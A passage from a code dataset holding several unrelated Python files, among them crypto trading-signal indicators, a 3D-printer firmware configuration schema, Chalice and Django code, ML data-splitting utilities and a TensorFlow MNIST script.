o_b=70):\n rsi_array = self.df['rsi'].array\n if rsi_array[-3] <= o_s <= rsi_array[-2]:\n self.rsi_ob_os_dict['oversold'] = True\n elif rsi_array[-3] >= o_b >= rsi_array[-2]:\n self.rsi_ob_os_dict['overbought'] = True\n return self.rsi_ob_os_dict\n\n def macd_signals(self):\n if self.df['MACD_12_26_9'].array[-2] > self.df['MACDs_12_26_9'].array[-2]:\n if self.df['MACD_12_26_9'].array[-3] < self.df['MACDs_12_26_9'].array[-3]:\n self.macd_dict['MACD cross'] = True\n elif self.df['MACD_12_26_9'].array[-2] < self.df['MACDs_12_26_9'].array[-2]:\n if self.df['MACD_12_26_9'].array[-3] > self.df['MACDs_12_26_9'].array[-3]:\n self.macd_dict['MACD cross'] = False\n if (self.df['MACD_12_26_9'].array[-2], self.df['MACDs_12_26_9'].array[-2]) > (0, 0):\n if (self.df['MACD_12_26_9'].array[-3], self.df['MACDs_12_26_9'].array[-3]) <= (0, 0):\n self.macd_dict['MACD 0 cross'] = True\n elif (self.df['MACD_12_26_9'].array[-2], self.df['MACDs_12_26_9'].array[-2]) < (0, 0):\n if (self.df['MACD_12_26_9'].array[-3], self.df['MACDs_12_26_9'].array[-3]) >= (0, 0):\n self.macd_dict['MACD 0 cross'] = False\n\n def ema_signals(self):\n ema_200 = self.df['ema_200'].array[-3:]\n ema_50 = self.df['ema_50'].array[-3:]\n ema_20 = self.df['ema_20'].array[-3:]\n price = self.df['close'].array[-3:]\n if ema_200[0] > price[0] and ema_200[1] >= price[1] and ema_200[2] < price[2]:\n self.ema_signals_dict['Price crossing EMA200'] = True\n elif ema_200[0] < price[0] and ema_200[1] <= price[1] and ema_200[2] > price[2]:\n self.ema_signals_dict['Price crossing EMA200'] = False\n if ema_20[0] > ema_50[0] and ema_20[1] >= ema_50[1] and ema_20[2] < ema_50[2]:\n self.ema_signals_dict['EMA20 crossing EMA50'] = False\n elif ema_20[0] < ema_50[0] and ema_20[1] <= ema_50[1] and ema_20[2] > ema_50[2]:\n self.ema_signals_dict['EMA20 crossing EMA50'] = True\n if ema_50[0] > ema_200[0] and ema_50[1] >= ema_200[1] and ema_50[2] < ema_200[2]:\n self.ema_signals_dict['EMA50 crossing EMA200'] = False\n elif ema_50[0] < ema_200[0] and ema_50[1] <= ema_200[1] and ema_50[2] > ema_200[2]:\n self.ema_signals_dict['EMA50 crossing EMA200'] = True\n return self.ema_signals_dict\n\n # def vol_rise_fall(self):\n # recent_vol = self.df.volume.tail(3).array\n # self.vol_signal = True if recent_vol[0] < recent_vol[1] < recent_vol[2] else False\n # return self.vol_signal\n #\n # def large_vol_candle(self):\n # self.vol_candle = True if self.df.volume.array[-1] >= self.df.volume.tail(14).values.mean()*2 else False\n # return self.vol_candle\n\n\nasync def create_signals_instance(symbol='BTCUSDT', tf='15m'):\n s = Signals(symbol, tf)\n await s._async_init()\n return s\n\n\nif __name__ == '__main__':\n x = datetime.now()\n df = CoinData.get_dataframe('BTCUSDT', '15m')\n print(Signals.get_heiken_ashi(df))\n print(datetime.now() - x)","sub_path":"async_signals.py","file_name":"async_signals.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"583099171","text":"import configema as ce\n\ndef simple_list(elem_title, value_title, **kwargs):\n return ce.Array(table=True, elem=ce.Compound('elem', title=elem_title, attrs=[\n ce.String(key='value', title=value_title)\n ]), **kwargs)\n\ndef interrupt_timer_choice(**kwargs):\n return ce.Compound('interrupt_timer', ident='id_interrupt_timer_choice', collapsed=True, attrs=[\n ce.Reference(key='oc_unit', ref_array='id_board.platform', ref_array_descend=['clock', 'avail_oc_units'], ref_id_key='value', ref_name_key='value', title='Output 
compare unit', deref_key='lalal')\n ], **kwargs)\n\ndef pin_choice(**kwargs):\n return ce.String(**kwargs)\n\ndef digital_input_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['digital_inputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef analog_input_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['analog_inputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef pwm_output_choice(**kwargs):\n return ce.Reference(ref_array='id_configuration.board_data', ref_array_descend=['pwm_outputs'], ref_id_key='Name', ref_name_key='Name', **kwargs)\n\ndef i2c_choice(**kwargs):\n return ce.OneOf(disable_collapse=True, choices=[\n ce.Compound('At91SamI2c', attrs=[\n ce.String(key='Device'),\n ce.Integer(key='Ckdiv'),\n ce.Float(key='I2cFreq')\n ])\n ], **kwargs)\n\ndef spi_choice(**kwargs):\n return ce.OneOf(disable_collapse=True, choices=[\n ce.Compound('At91SamSpi', attrs=[\n ce.String(key='Device')\n ])\n ], **kwargs)\n\ndef at91sam3x_clock():\n return ce.Compound('At91Sam3xClock', key='clock', title='Clock', collapsed=True, attrs=[\n ce.Integer(key='prescaler', title='Prescaler'),\n ce.String(key='primary_timer', title='Primary timer'),\n ce.Constant(key='avail_oc_units', value=[\n {\n 'value': 'TC{}{}'.format(n, l)\n } for n in range(9) for l in ('A', 'B', 'C')\n ])\n ])\n\ndef at91sam_adc():\n return ce.Compound('At91SamAdc', key='adc', title='ADC', collapsed=True, attrs=[\n ce.Float(key='freq', title='Frequency'),\n ce.Float(key='avg_interval', title='Averaging interval'),\n ce.Float(key='smoothing', title='Smoothing factor'),\n ce.Integer(key='startup', title='Startup time'),\n ce.Integer(key='settling', title='Settling time'),\n ce.Integer(key='tracking', title='Tracking time'),\n ce.Integer(key='transfer', title='Transfer time')\n ])\n\ndef at91sam_watchdog():\n return ce.Compound('At91SamWatchdog', key='watchdog', title='Watchdog', collapsed=True, attrs=[\n ce.Integer(key='Wdv', title='Wdv')\n ])\n\ndef at91sam_pins():\n return ce.Compound('At91SamPins', key='pins', title='Pins', collapsed=True, attrs=[\n ce.Constant(key='input_modes', value=[\n { 'ident': 'At91SamPinInputModeNormal', 'name': 'Normal' },\n { 'ident': 'At91SamPinInputModePullUp', 'name': 'Pull-up' }\n ])\n ])\n\ndef editor():\n return ce.Compound('editor', title='Configuration editor', disable_collapse=True, no_header=True, attrs=[\n ce.Constant(key='version', value=1),\n ce.Array(key='configurations', title='Configurations', elem=ce.Compound('config', key='config', ident='id_configuration', title='Configuration', title_key='name', collapsed=True, attrs=[\n ce.String(key='name', title='Name'),\n ce.Reference(key='board_id', ref_array='boards', ref_id_key='identifier', ref_name_key='name', deref_key='board_data', title='Board'),\n ce.Float(key='InactiveTime', title='Inactive time'),\n ce.Compound('advanced', key='advanced', title='Advanced parameters', collapsed=True, attrs=[\n ce.Float(key='LedBlinkInterval', title='LED blink interval'),\n ce.Float(key='ForceTimeout', title='Force timeout'),\n ]),\n ce.Array(key='steppers', title='Steppers', disable_collapse=True, elem=ce.Compound('stepper', title='Stepper', title_key='Name', collapsed=True, ident='id_configuration_stepper', attrs=[\n ce.String(key='Name', title='Name'),\n ce.Reference(key='stepper_port', title='Stepper port', ref_array='id_configuration.board_data', ref_array_descend=['stepper_ports'], ref_id_key='Name', ref_name_key='Name'),\n 
ce.Boolean(key='InvertDir', title='Invert direction'),\n ce.Float(key='StepsPerUnit', title='Steps per unit'),\n ce.Float(key='MinPos', title='Minimum position'),\n ce.Float(key='MaxPos', title='Maximum position'),\n ce.Float(key='MaxSpeed', title='Maximum speed'),\n ce.Float(key='MaxAccel', title='Maximum acceleration'),\n ce.Float(key='DistanceFactor', title='Distance factor'),\n ce.Float(key='CorneringDistance', title='Cornering distance'),\n ce.Boolean(key='EnableCartesianSpeedLimit', title='Is cartesian'),\n ce.OneOf(key='homing', title='Homing', collapsed=True, choices=[\n ce.Compound('no_homing', title='Disabled', attrs=[]),\n ce.Compound('homing', title='Enabled', ident='id_board_steppers_homing', attrs=[\n ce.Boolean(key='HomeDir', title='Homing direction', false_title='Negative', true_title='Positive'),\n digital_input_choice(key='HomeEndstopInput', title='Endstop digital input'),\n ce.Boolean(key='HomeEndInvert', title='Invert endstop'),\n ce.Float(key='HomeFastMaxDist', title='Maximum fast (initial) travel'),\n ce.Float(key='HomeRetractDist', title='Retraction travel'),\n ce.Float(key='HomeSlowMaxDist', title='Maximum slow (after retraction) travel'),\n ce.Float(key='HomeFastSpeed', title='Fast speed'),\n ce.Float(key='HomeRetractSpeed', title='Retraction speed'),\n ce.Float(key='HomeSlowSpeed', title='Slow speed')\n ])\n ])\n ])),\n ce.Array(key='heaters', title='Heaters', disable_collapse=True, elem=ce.Compound('heater', title='Heater', title_key='Name', collapsed=True, ident='id_configuration_heater', attrs=[\n ce.String(key='Name', title='Name'),\n pwm_output_choice(key='pwm_output', title='PWM output'),\n ce.Integer(key='SetMCommand', title='Set command M-number'),\n ce.Integer(key='WaitMCommand', title='Wait command M-number'),\n analog_input_choice(key='ThermistorInput', title='Thermistor analog input'),\n ce.Float(key='MinSafeTemp', title='Minimum safe temperature [C]'),\n ce.Float(key='MaxSafeTemp', title='Maximum safe temperature [C]'),\n ce.Compound('conversion', key='conversion', title='Conversion parameters', collapsed=True, attrs=[\n ce.Float(key='ResistorR', title='Resistor resistance [ohm]'),\n ce.Float(key='R0', title='Thermistor resistance @25C [ohm]'),\n ce.Float(key='Beta', title='Thermistor beta value [K]'),\n ce.Float(key='MinTemp', title='Minimum temperature [C]'),\n ce.Float(key='MaxTemp', title='Maximum temperature [C]')\n ]),\n ce.Compound('control', key='control', title='Control parameters', collapsed=True, attrs=[\n ce.Float(key='ControlInterval', title='Control interval [s]'),\n ce.Float(key='PidP', title='PID proportional factor [1/K]'),\n ce.Float(key='PidI', title='PID integral factor [1/(Ks)]'),\n ce.Float(key='PidD', title='PID derivative factor [s/K]'),\n ce.Float(key='PidIStateMin', title='PID integral state min [1]'),\n ce.Float(key='PidIStateMax', title='PID integral state max [1]'),\n ce.Float(key='PidDHistory', title='PID derivative smoothing factor [1]')\n ]),\n ce.Compound('observer', key='observer', title='Observation parameters', collapsed=True, attrs=[\n ce.Float(key='ObserverInterval', title='Observation interval [s]'),\n ce.Float(key='ObserverTolerance', title='Observation tolerance [K]'),\n ce.Float(key='ObserverMinTime', title='Observation minimum time [s]')\n ])\n ])),\n ce.Array(key='fans', title='Fans', disable_collapse=True, elem=ce.Compound('fan', title='Fan', title_key='Name', collapsed=True, ident='id_configuration_fan', attrs=[\n ce.String(key='Name', title='Name'),\n pwm_output_choice(key='pwm_output', title='PWM 
output'),\n ce.Integer(key='SetMCommand', title='Set command M-number'),\n ce.Integer(key='OffMCommand', title='Off command M-number'),\n ])),\n ce.OneOf(key='probe', title='Bed probing', collapsed=True, choices=[\n ce.Compound('NoProbe', title='Disabled', attrs=[]),\n ce.Compound('Probe', title='Enabled', ident='id_configuration_probe_probe', attrs=[\n digital_input_choice(key='ProbePin', title='Probe pin'),\n ce.Boolean(key='InvertInput', title='Invert input'),\n ce.Float(key='OffsetX', title='Probe offset (X)'),\n ce.Float(key='OffsetY', title='Probe offset (Y)'),\n ce.Float(key='StartHeight', title='Starting Z for probing a point'),\n ce.Float(key='LowHeight', title='Minimum Z to move down to'),\n ce.Float(key='RetractDist', title='Retraction distance'),\n ce.Float(key='MoveSpeed', title='Speed for moving to probe points'),\n ce.Float(key='FastSpeed', title='Fast (first) probing speed'),\n ce.Float(key='RetractSpeed', title='Retraction speed'),\n ce.Float(key='SlowSpeed', title='Slow (second) probing speed'),\n ce.Array(key='ProbePoints', title='Probe points', elem=ce.Compound('ProbePoint', title='Probe point', attrs=[\n ce.Float(key='X'),\n ce.Float(key='Y')\n ]))\n ])\n ])\n ])),\n ce.Array(key='boards', title='Boards', elem=ce.Compound('board', title='Board', title_key='name', collapsed=True, ident='id_board', attrs=[\n ce.String(key='identifier', title='Identifier'),\n ce.String(key='name', title='Name'),\n ce.String(key='board_for_build', title='Board for building (see nix/boards.nix)'),\n pin_choice(key='LedPin', title='LED pin'),\n ce.OneOf(key='config_manager', title='Runtime configuration', collapsed=True, choices=[\n ce.Compound('ConstantConfigManager', title='Disabled', attrs=[]),\n ce.Compound('RuntimeConfigManager', title='Enabled', attrs=[\n ce.OneOf(key='ConfigStore', title='Configuration storage', disable_collapse=True, choices=[\n ce.Compound('NoStore', title='None', attrs=[]),\n ce.Compound('EepromConfigStore', attrs=[\n ce.OneOf(key='Eeprom', title='EEPROM backend', disable_collapse=True, choices=[\n ce.Compound('I2cEeprom', attrs=[\n i2c_choice(key='I2c', title='I2C backend'),\n ce.Integer(key='I2cAddr'),\n ce.Integer(key='Size'),\n ce.Integer(key='BlockSize'),\n ce.Float(key='WriteTimeout')\n ])\n ]),\n ce.Integer(key='StartBlock'),\n ce.Integer(key='EndBlock'),\n ])\n ])\n ]),\n ]),\n ce.Compound('serial', key='serial', title='Serial parameters', collapsed=True, attrs=[\n ce.Integer(key='BaudRate', title='Baud rate'),\n ce.Integer(key='RecvBufferSizeExp', title='Receive buffer size (power of two exponent)'),\n ce.Integer(key='SendBufferSizeExp', title='Send buffer size (power of two exponent)'),\n ce.Integer(key='GcodeMaxParts', title='Max parts in GCode command'),\n ce.OneOf(key='Service', title='Backend', disable_collapse=True, choices=[\n ce.Compound('AsfUsbSerial', title='AT91 USB', attrs=[]),\n ce.Compound('At91Sam3xSerial', title='AT91 UART', attrs=[])\n ])\n ]),\n ce.OneOf(key='sdcard', title='SD card', collapsed=True, choices=[\n ce.Compound('NoSdCard', title='Disabled', attrs=[]),\n ce.Compound('SdCard', title='Enabled', attrs=[\n ce.Integer(key='BufferBaseSize', title='Buffer size'),\n ce.Integer(key='MaxCommandSize', title='Maximum command size'),\n ce.OneOf(key='GcodeParser', title='G-code parser', choices=[\n ce.Compound('TextGcodeParser', title='Text G-code parser', attrs=[\n ce.Integer(key='MaxParts', title='Maximum number of command parts')\n ]),\n ce.Compound('BinaryGcodeParser', title='Binary G-code parser', attrs=[\n ce.Integer(key='MaxParts', 
title='Maximum number of command parts')\n ])\n ]),\n ce.OneOf(key='SdCardService', title='Driver', collapsed=True, choices=[\n ce.Compound('SpiSdCard', title='SPI', attrs=[\n pin_choice(key='SsPin', title='SS pin'),\n spi_choice(key='SpiService', title='SPI driver')\n ])\n ])\n ])\n ]),\n ce.Compound('performance', key='performance', title='Performance parameters', collapsed=True, attrs=[\n ce.Float(key='MaxStepsPerCycle', title='Max steps per cycle'),\n ce.Integer(key='StepperSegmentBufferSize', title='Stepper segment buffer size'),\n ce.Integer(key='EventChannelBufferSize', title='Event channel buffer size'),\n ce.Integer(key='LookaheadBufferSize', title='Lookahead buffer size'),\n ce.Integer(key='LookaheadCommitCount', title='Lookahead commit count'),\n ce.String(key='FpType', enum=['float', 'double']),\n ce.String(key='AxisDriverPrecisionParams', title='Stepping precision parameters', enum=['AxisDriverAvrPrecisionParams', 'AxisDriverDuePrecisionParams']),\n ce.Float(key='EventChannelTimerClearance', title='Event channel timer clearance')\n ]),\n interrupt_timer_choice(key='EventChannelTimer', title='Event channel timer'),\n ce.Array(key='stepper_ports', title='Stepper ports', disable_collapse=True, elem=ce.Compound('stepper_port', title='Stepper port', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='DirPin', title='Direction pin'),\n pin_choice(key='StepPin', title='Step pin'),\n pin_choice(key='EnablePin', title='Enable pin'),\n interrupt_timer_choice(key='StepperTimer', title='Stepper timer'),\n ])),\n ce.Array(key='digital_inputs', title='Digital inputs', disable_collapse=True, elem=ce.Compound('digital_input', title='Digital input', title_key='Name', collapsed=True, ident='id_board_digital_inputs', attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='Pin', title='Pin'),\n ce.Reference(key='InputMode', title='Input mode', ref_array='id_board.platform', ref_array_descend=['pins', 'input_modes'], ref_id_key='ident', ref_name_key='name')\n ])),\n ce.Array(key='analog_inputs', title='Analog inputs', disable_collapse=True, elem=ce.Compound('analog_input', title='Analog input', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n pin_choice(key='Pin', title='Pin'),\n ])),\n ce.Array(key='pwm_outputs', title='PWM outputs', disable_collapse=True, elem=ce.Compound('pwm_output', title='PWM output', title_key='Name', collapsed=True, attrs=[\n ce.String(key='Name', title='Name'),\n ce.OneOf(key='Backend', title='Backend', disable_collapse=True, choices=[\n ce.Compound('SoftPwm', attrs=[\n pin_choice(key='OutputPin', title='Output pin'),\n ce.Boolean(key='OutputInvert', title='Output logic', false_title='Normal (On=High)', true_title='Inverted (On=Low)'),\n ce.Float(key='PulseInterval', title='PWM pulse duration'),\n interrupt_timer_choice(key='Timer', title='Soft PWM Timer')\n ])\n ])\n ])),\n ce.OneOf(key='platform', title='Platform', disable_collapse=True, choices=[\n ce.Compound('At91Sam3x8e', attrs=[\n at91sam3x_clock(),\n at91sam_adc(),\n at91sam_watchdog(),\n at91sam_pins()\n ])\n ]),\n ce.Array(key='board_helper_includes', title='Board helper includes', disable_collapse=True, table=True, elem=ce.String(title='Name')),\n ]))\n ])\n","sub_path":"config_gui/aprinter_config_editor.py","file_name":"aprinter_config_editor.py","file_ext":"py","file_size_in_byte":17877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"387678577","text":"from pytest 
import fixture\nfrom attr import evolve\n\nfrom chalice.deploy import models\n\n\n@fixture\ndef lambda_function():\n return models.LambdaFunction(\n resource_name='foo',\n function_name='app-stage-foo',\n deployment_package=None,\n environment_variables={},\n runtime='python2.7',\n handler='app.app',\n tags={},\n timeout=None,\n memory_size=None,\n role=models.PreCreatedIAMRole(role_arn='foobar'),\n security_group_ids=[],\n subnet_ids=[],\n layers=[],\n reserved_concurrency=None,\n )\n\n\ndef test_can_instantiate_empty_application():\n app = models.Application(stage='dev', resources=[])\n assert app.dependencies() == []\n\n\ndef test_can_instantiate_app_with_deps():\n role = models.PreCreatedIAMRole(role_arn='foo')\n app = models.Application(stage='dev', resources=[role])\n assert app.dependencies() == [role]\n\n\ndef test_can_default_to_no_auths_in_rest_api(lambda_function):\n rest_api = models.RestAPI(\n resource_name='rest_api',\n swagger_doc={'swagger': '2.0'},\n minimum_compression='',\n api_gateway_stage='api',\n lambda_function=lambda_function,\n )\n assert rest_api.dependencies() == [lambda_function]\n\n\ndef test_can_add_authorizers_to_dependencies(lambda_function):\n auth1 = evolve(lambda_function, resource_name='auth1')\n auth2 = evolve(lambda_function, resource_name='auth2')\n rest_api = models.RestAPI(\n resource_name='rest_api',\n swagger_doc={'swagger': '2.0'},\n minimum_compression='',\n api_gateway_stage='api',\n lambda_function=lambda_function,\n authorizers=[auth1, auth2],\n )\n assert rest_api.dependencies() == [lambda_function, auth1, auth2]\n","sub_path":"misc/aws-hello-world/lib/python3.7/site-packages/tests/unit/deploy/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"127044473","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('projects', '0002_auto_20140903_0920'),\n ('contenttypes', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Reference',\n fields=[\n ('id', models.AutoField(verbose_name='ID', auto_created=True, serialize=False, primary_key=True)),\n ('object_id', models.PositiveIntegerField()),\n ('ref', models.BigIntegerField()),\n ('created_at', models.DateTimeField(default=django.utils.timezone.now)),\n ('content_type', models.ForeignKey(related_name='+', to='contenttypes.ContentType')),\n ('project', models.ForeignKey(related_name='references', to='projects.Project')),\n ],\n options={\n 'ordering': ['created_at'],\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='reference',\n unique_together=set([('project', 'ref')]),\n ),\n ]\n","sub_path":"taiga/projects/references/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"523779381","text":"import glob as _glob\nimport json as _json\nimport os as _os\nimport random as _rd\n\nimport numpy as _np\n\n_sep = _os.sep\n\n\ndef create_ratio_split(files, save_to_dir=None, ratio: list = None, first_key='train', name='SPLIT',\n shuffle_files=True):\n if shuffle_files:\n _rd.shuffle(files)\n\n keys = [first_key]\n if len(ratio) == 2:\n keys.append('test')\n elif len(ratio) == 3:\n keys.append('validation')\n 
keys.append('test')\n\n _ratio = ratio[::-1]\n locs = _np.array([sum(_ratio[0:i + 1]) for i in range(len(ratio) - 1)])\n locs = (locs * len(files)).astype(int)\n splits = _np.split(files[::-1], locs)[::-1]\n splits = dict([(k, sp.tolist()[::-1]) for k, sp in zip(keys, splits)])\n if save_to_dir:\n f = open(save_to_dir + _sep + f'{name}.json', \"w\")\n f.write(_json.dumps(splits))\n f.close()\n else:\n return splits\n\n\ndef create_k_fold_splits(files, k=0, save_to_dir=None, shuffle_files=True, name='SPLIT'):\n if shuffle_files:\n _rd.shuffle(files)\n\n ix_splits = _np.array_split(_np.arange(len(files)), k)\n for i in range(len(ix_splits)):\n test_ix = ix_splits[i].tolist()\n val_ix = ix_splits[(i + 1) % len(ix_splits)].tolist()\n train_ix = [ix for ix in _np.arange(len(files)) if ix not in test_ix + val_ix]\n\n splits = {'train': [files[ix] for ix in train_ix],\n 'validation': [files[ix] for ix in val_ix],\n 'test': [files[ix] for ix in test_ix]}\n\n if save_to_dir:\n f = open(save_to_dir + _sep + f\"{name}_{i}.json\", \"w\")\n f.write(_json.dumps(splits))\n f.close()\n else:\n return splits\n\n\ndef uniform_mix_two_lists(smaller, larger, shuffle=True):\n if shuffle:\n _rd.shuffle(smaller)\n _rd.shuffle(larger)\n\n len_smaller, len_larger = len(smaller), len(larger)\n\n accumulator = []\n while len(accumulator) < len_smaller + len_larger:\n try:\n for i in range(int(len_larger / len_smaller)):\n accumulator.append(larger.pop())\n except Exception:\n pass\n try:\n accumulator.append(smaller.pop())\n except Exception:\n pass\n\n return accumulator\n\n\ndef make_weights_for_balanced_classes(images, nclasses):\n count = [0] * nclasses\n for item in images:\n count[item[1]] += 1\n weight_per_class = [0.] * nclasses\n N = float(sum(count))\n for i in range(nclasses):\n weight_per_class[i] = N / float(count[i])\n weight = [0] * len(images)\n for idx, val in enumerate(images):\n weight[idx] = weight_per_class[val[1]]\n return weight\n\n\ndef should_create_splits_(log_dir, dspec, args):\n if dspec.get('split_dir') and _os.path.exists(dspec.get('split_dir')) and len(list(\n _os.listdir(dspec.get('split_dir')))) > 0:\n return False\n\n dspec['split_dir'] = log_dir + _sep + 'splits'\n if _os.path.exists(dspec['split_dir']) and len(list(_os.listdir(dspec['split_dir']))) > 0:\n return False\n\n _os.makedirs(dspec['split_dir'], exist_ok=True)\n if args['num_folds'] is None and args['split_ratio'] is None:\n with open(dspec['split_dir'] + _sep + 'experiment.json', 'w') as sp:\n sp.write(_json.dumps({'train': [], 'validation': [], 'test': []}))\n return False\n\n return True\n\n\ndef list_files(dspec):\n ext = dspec.get('extension', '*').replace('.', '')\n rec = dspec.get('recursive', False)\n rec_pattern = '**/' if rec else ''\n if dspec.get('sub_folders') is None:\n path = dspec['data_dir']\n return [f.replace(path + _sep, '') for f in\n _glob.glob(f\"{path}/{rec_pattern}*.{ext}\", recursive=rec)]\n\n files = []\n for sub in dspec['sub_folders']:\n path = dspec['data_dir'] + _sep + sub\n files += [f.replace(dspec['data_dir'] + _sep, '') for f in\n _glob.glob(f\"{path}/{rec_pattern}*.{ext}\", recursive=rec)]\n return files\n\n\ndef default_data_splitter_(dspec, args):\n r\"\"\"\n Initialize k-folds for given dataspec.\n If: custom splits path is given it will use the splits from there\n else: will create new k-splits and run k-fold cross validation.\n \"\"\"\n if args.get('num_folds') is not None:\n create_k_fold_splits(\n files=list_files(dspec),\n k=args['num_folds'],\n save_to_dir=dspec['split_dir'],\n 
name=dspec['name']\n )\n elif args.get('split_ratio') is not None:\n create_ratio_split(\n files=list_files(dspec),\n save_to_dir=dspec['split_dir'],\n ratio=args['split_ratio'],\n name=dspec['name']\n )\n","sub_path":"easytorch/data/datautils.py","file_name":"datautils.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"260438002","text":"import os\nimport sys\nimport time\nimport tensorflow as tf\nfrom tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets\n\nmnist = read_data_sets(\"data\", one_hot=True, reshape=False, validation_size=0)\n\nclass batch_norm(object):\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum,\n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n\nif __name__ == '__main__':\n # input image\n x = tf.placeholder(tf.float32, [None, 28, 28, 1])\n # labels\n y_ = tf.placeholder(tf.float32, [None, 10])\n # weight and bias\n w1 = tf.Variable(tf.truncated_normal([784, 300], stddev=0.1))\n b1 = tf.Variable(tf.ones([300])/10.0)\n bn = batch_norm(name=\"layer1\")\n y1 = tf.nn.relu(bn(tf.matmul(tf.reshape(x, [-1, 784]), w1) + b1))\n # y1 = tf.nn.dropout(y1, 0.5) \n w2 = tf.Variable( tf.truncated_normal([300, 10], stddev=0.1))\n b2 = tf.Variable(tf.ones([10])/10.0)\n bn2 = batch_norm(name=\"layer2\")\n y = tf.nn.softmax(bn2(tf.matmul(y1, w2) + b2))\n loss = -tf.reduce_sum(y_ * tf.log(y))\n # compare\n is_correct = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n # count accuracy\n accuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\n # optimize\n optimizer = tf.train.GradientDescentOptimizer(0.003)\n train_step = optimizer.minimize(loss)\n # init and gpu options\n init = tf.global_variables_initializer()\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.2)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n sess = tf.Session(config=config)\n sess.run(init)\n test_x, test_y = mnist.test.images, mnist.test.labels\n max_tac = 0\n for i in range(50000):\n batch_x, batch_y = mnist.train.next_batch(100)\n sess.run(train_step, feed_dict={x:batch_x, y_:batch_y})\n if i % 500 == 0:\n ac, l = sess.run([accuracy, loss], feed_dict={x:batch_x, y_:batch_y})\n tac = sess.run(accuracy, feed_dict={x:test_x, y_:test_y})\n if max_tac - tac > 0.2:\n break\n if tac > max_tac:\n max_tac = tac\n print(\"accuracy is %f, loss is %f. 
test accuracy is %f\" % (ac, l, tac))\n\n","sub_path":"tensorflowLearning/v2_yzkk_mnist.py","file_name":"v2_yzkk_mnist.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"529313465","text":"#!/usr/bin/env python\nimport sys\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import RandomForestRegressor \nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.manifold import TSNE\nfrom collections import OrderedDict\nfrom configparser import ConfigParser\nfrom sqlalchemy import create_engine, text\nimport click\nimport json\nimport itertools\nimport re\n\ncnx_dir = os.getenv(\"CONNECTION_INFO\")\nparser = ConfigParser()\nparser.read(os.path.join(cnx_dir, \"db_conn.ini\"))\npsql_params = {k:v for k,v in parser._sections[\"disorientation\"].items()}\npsql_string = \"postgresql://{user}:{password}@{host}:{port}/{dbname}\"\nengine = create_engine(psql_string.format(**psql_params))\npd.set_option('display.width', 180)\npd.set_option('display.float_format', lambda x: '%.3f' % x)\npd.set_option('display.max_rows', 125)\nhome = os.getenv(\"HOME\")\nout_dir = os.path.join(home,\"Dropbox/phd/dissertation/\")\nfig_home = os.path.join(home,out_dir, \"figs\")\n\ndf = pd.read_sql(\"select * from all_features\", engine)\ndf.fillna(0, inplace=True)\nx_vars = [col for col in df.columns if col not in \n ['numpermit', 'numdemo', 'geoid10', 'wkb_geometry', \n 'scale_const', 'scale_demo', 'net']]\nmin_max_scale = lambda x: (x-x.min())/(x.max() - x.min())\nstd_scale = lambda x: (x-x.mean())/float(x.std())\ndf['scale_const'] = min_max_scale(df.numpermit)\ndf['scale_demo'] = min_max_scale(df.numdemo)\n#permit column is actually net construction, but needs to be named permit\n#to run correctly in fact_heatmap function\ndf['net'] = df.scale_const - df.scale_demo\nRANDOM_STATE = 1416\n\n#fig = px.parallel_coordinates(df[x_vars+[\"net\"]], color=\"net\", labels=x_vars+[\"net\"], \n#color_continuous_scale=px.colors.diverging.Tealrose, color_continuous_midpoint=0)\n#ply.offline.plot(fig)\n\ndef add_missing(df):\n idx_cols = [\"month\", \"year\", \"name\"]\n idx = list(itertools.product(*[range(1,13),\n range(2002,2017),\n df.name.unique()]))\n df.set_index(idx_cols, inplace=True)\n df = df.reindex(idx)\n df.reset_index(inplace=True)\n df.permit.fillna(0, inplace=True)\n return df\n\n#-----------------------------------------------------------------------------\n#--------------------------- Urban Index -------------------------------------\n#-----------------------------------------------------------------------------\nsql =(\"select w.geoid10, numpermit, numdemo, ninter/sqmiland inter_density,\"\n \"totpop/sqmiland popdensity, hhinc, \"\n #\"pct_wh,pct_bl, \"\n \"pct_bl + pct_ai + pct_as + \"\n \"pct_nh + pct_ot + pct_2m pct_nonwh, \"\n \"pct_pov_tot, pct_to14 + pct_15to19 pct_u19,\"\n \"pct_20to24, pct_25to34, pct_35to49, 